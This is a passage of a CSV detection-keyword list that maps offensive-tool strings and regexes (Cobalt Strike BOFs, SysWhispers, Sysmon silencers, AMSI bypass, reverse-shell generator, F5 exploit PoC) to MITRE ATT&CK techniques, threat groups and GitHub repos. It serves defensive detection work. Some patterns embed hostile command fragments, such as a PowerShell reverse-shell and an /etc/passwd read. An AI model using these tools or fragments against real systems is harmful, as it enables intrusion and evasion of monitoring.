*",".{0,1000}syscalls_spawn\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","0","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*syscalls_spawn.*",".{0,1000}syscalls_spawn\..{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*syscallsapcspawn.x64*",".{0,1000}syscallsapcspawn\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*syscalls-asm.h*",".{0,1000}syscalls\-asm\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/InlineWhispers","1","1","N/A","10","10","295","41","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z" "*syscallsdump.x64*",".{0,1000}syscallsdump\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*syscallsinject.x64*",".{0,1000}syscallsinject\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*syscallsspawn.x64*",".{0,1000}syscallsspawn\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*syscallStuff.asm*",".{0,1000}syscallStuff\.asm.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","10","3","275","41","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" "*sysdream/ligolo*",".{0,1000}sysdream\/ligolo.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1643","218","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*Sysmon is being suffocated*",".{0,1000}Sysmon\sis\sbeing\ssuffocated.{0,1000}","offensive_tool_keyword","sysmonquiet","RDLL for Cobalt Strike beacon to silence Sysmon process","T1055 - T1055.012 - T1063","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ScriptIdiot/SysmonQuiet","1","0","N/A","N/A","1","84","16","2022-09-09T12:28:15Z","2022-07-11T14:17:34Z" "*Sysmon is quiet now!*",".{0,1000}Sysmon\sis\squiet\snow!.{0,1000}","offensive_tool_keyword","sysmonquiet","RDLL for Cobalt Strike beacon to silence Sysmon process","T1055 - T1055.012 - T1063","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ScriptIdiot/SysmonQuiet","1","0","N/A","N/A","1","84","16","2022-09-09T12:28:15Z","2022-07-11T14:17:34Z" "*sysmonquiet.*",".{0,1000}sysmonquiet\..{0,1000}","offensive_tool_keyword","sysmonquiet","RDLL for Cobalt Strike beacon to silence Sysmon process","T1055 - T1055.012 - T1063","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ScriptIdiot/SysmonQuiet","1","1","N/A","N/A","1","84","16","2022-09-09T12:28:15Z","2022-07-11T14:17:34Z" "*SysmonQuiet-main*",".{0,1000}SysmonQuiet\-main.{0,1000}","offensive_tool_keyword","sysmonquiet","RDLL for Cobalt Strike beacon to silence Sysmon process","T1055 - T1055.012 - T1063","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ScriptIdiot/SysmonQuiet","1","1","N/A","N/A","1","84","16","2022-09-09T12:28:15Z","2022-07-11T14:17:34Z" "*SySS-Research*",".{0,1000}SySS\-Research.{0,1000}","offensive_tool_keyword","Github Username","github repo Open source IT security software tools and information and exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/SySS-Research","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*SySS-Research/Seth*",".{0,1000}SySS\-Research\/Seth.{0,1000}","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","1","N/A","9","10","1364","326","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" "*system rm -f /current/tmp/ftshell.latest*",".{0,1000}system\srm\s\-f\s\/current\/tmp\/ftshell\.latest.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- from files ftshell File transfer shell","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1","1","0","N/A","N/A","1","1","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z" "*System token is copied to the current process. Executing cmd.exe..*",".{0,1000}System\stoken\sis\scopied\sto\sthe\scurrent\sprocess\.\sExecuting\scmd\.exe\.\..{0,1000}","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","0","N/A","10","2","160","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z" "*System.DirectoryServices.AccountManagement.GroupPrincipal*FindByIdentity*D",".{0,1000}System\.DirectoryServices\.AccountManagement\.GroupPrincipal.{0,1000}FindByIdentity.{0,1000}D","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration - domain admins","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*'System.Ma'+'nag'+'eme'+'nt.Autom'+'ation.A'+'ms'+'iU'+'ti'+'ls'*",".{0,1000}\'System\.Ma\'\+\'nag\'\+\'eme\'\+\'nt\.Autom\'\+\'ation\.A\'\+\'ms\'\+\'iU\'\+\'ti\'\+\'ls\'.{0,1000}","offensive_tool_keyword","AmsiBypass","bypassing Anti-Malware Scanning Interface (AMSI) features","T1548.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","0","N/A","10","10","1492","260","2023-03-01T17:09:02Z","2019-05-14T06:09:25Z" "*System.Net.Sockets.TCPClient*GetStream()*iex*Out-String*",".{0,1000}System\.Net\.Sockets\.TCPClient.{0,1000}GetStream\(\).{0,1000}iex.{0,1000}Out\-String.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*SYSTEM\CurrentControlSet\Services\dcrypt*",".{0,1000}SYSTEM\\CurrentControlSet\\Services\\dcrypt.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","5","417","103","2024-02-23T14:13:01Z","2019-04-20T14:51:18Z" "*System32fileWritePermissions.txt*",".{0,1000}System32fileWritePermissions\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*systemctl disable IMDS*",".{0,1000}systemctl\sdisable\sIMDS.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/grahamhelton/IMDSpoof","1","0","N/A","8","1","84","2","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z" "*systemctl enable IMDS*",".{0,1000}systemctl\senable\sIMDS.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/grahamhelton/IMDSpoof","1","0","N/A","8","1","84","2","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z" "*systemctl start IMDS*",".{0,1000}systemctl\sstart\sIMDS.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/grahamhelton/IMDSpoof","1","0","N/A","8","1","84","2","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z" "*systemctl start nessusd*",".{0,1000}systemctl\sstart\snessusd.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*systemctl status IMDS*",".{0,1000}systemctl\sstatus\sIMDS.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/grahamhelton/IMDSpoof","1","0","N/A","8","1","84","2","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z" "*systemctl stop IMDS*",".{0,1000}systemctl\sstop\sIMDS.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/grahamhelton/IMDSpoof","1","0","N/A","8","1","84","2","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z" "*SysWhispers.git *",".{0,1000}SysWhispers\.git\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/InlineWhispers","1","0","N/A","10","10","295","41","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z" "*syswhispers.py*",".{0,1000}syswhispers\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/InlineWhispers","1","1","N/A","10","10","295","41","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z" "*syswhispers.py*",".{0,1000}syswhispers\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Sh0ckFR/InlineWhispers2","1","1","N/A","10","10","172","30","2022-07-21T08:40:05Z","2021-11-16T12:47:35Z" "*syswhispers.py*",".{0,1000}syswhispers\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*syswhispers.py*",".{0,1000}syswhispers\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*syswhispers.py*",".{0,1000}syswhispers\.py.{0,1000}","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","1","N/A","N/A","10","1143","156","2023-12-23T11:07:19Z","2022-03-07T18:56:21Z" "*SysWhispers2*",".{0,1000}SysWhispers2.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Sh0ckFR/InlineWhispers2","1","1","N/A","10","10","172","30","2022-07-21T08:40:05Z","2021-11-16T12:47:35Z" "*syswhispersv2_x86*",".{0,1000}syswhispersv2_x86.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*szymon1118/logon_backdoor*",".{0,1000}szymon1118\/logon_backdoor.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","1","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z" "*-t * -x lfr -f /etc/passwd*",".{0,1000}\-t\s.{0,1000}\s\-x\slfr\s\-f\s\/etc\/passwd.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/dunderhay/CVE-2020-5902","1","0","N/A","N/A","1","37","8","2024-03-19T01:21:06Z","2020-07-06T04:03:58Z" "*-t * -x rce -a list+auth+user+admin*",".{0,1000}\-t\s.{0,1000}\s\-x\srce\s\-a\slist\+auth\+user\+admin.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/dunderhay/CVE-2020-5902","1","0","N/A","N/A","1","37","8","2024-03-19T01:21:06Z","2020-07-06T04:03:58Z" "*t.me/Melteddd*",".{0,1000}t\.me\/Melteddd.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","1","N/A","10","4","395","120","2022-02-14T02:31:56Z","2021-09-03T17:34:44Z" "*-t: force use of Impersonation Privilege*",".{0,1000}\-t\:\sforce\suse\sof\sImpersonation\sPrivilege.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","0","#program content","10","2","154","24","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z" "*T0XlCv1.rule*",".{0,1000}T0XlCv1\.rule.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*T1esh0u/SecScanC2*",".{0,1000}T1esh0u\/SecScanC2.{0,1000}","offensive_tool_keyword","SecScanC2","SecScanC2 can manage assetment to create P2P network for security scanning & C2. The tool can assist security researchers in conducting penetration testing more efficiently - preventing scanning from being blocked - protecting themselves from being traced.","T1021 - T1090","TA0011 - TA0002 - TA0040 - TA0043","N/A","N/A","C2","https://github.com/T1esh0u/SecScanC2","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*t3l3machus/BabelStrike*",".{0,1000}t3l3machus\/BabelStrike.{0,1000}","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in 